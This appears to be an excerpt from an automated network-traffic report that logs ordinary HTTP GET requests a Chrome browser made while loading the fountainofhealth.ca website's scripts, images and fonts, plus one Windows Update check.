Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/facebook.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/Message-Blue.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/Info-Blue.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/unique-id-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/focusable-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/ie-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/css/Poppins-Regular.ttf HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveOrigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7bAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/keycode-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/plugin-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/FOH_EN_LOGO_Clr2024.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/safe-active-element-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2024-05/Group%209823_0.png?itok=DMkwTIJn HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/safe-blur-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widget-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /npm/bootstrap@3.4.1/dist/fonts/glyphicons-halflings-regular.woff2 HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/css/bootstrap.cssaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/controlgroup-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/form-reset-mixin-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/labels-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/mouse-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/FOH_EN_LOGO_Clr2024.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/checkboxradio-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/draggable-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/resizable-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/button-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/jquery.ui/ui/widgets/dialog-min.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/tabbable/index.umd.min.js?v=6.1.2 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/progress.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/misc/progress.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/assets/vendor/loadjs/loadjs.min.js?v=4.2.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=6mcCVPn7U+UYE3l&MD=ceMdVNLn HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
Source: global traffic HTTP traffic detected: GET /core/misc/debounce.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/announce.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/message.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/misc/message.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/ajax.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2024-05/Group%209823_0.png?itok=DMkwTIJn HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/misc/ajax.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
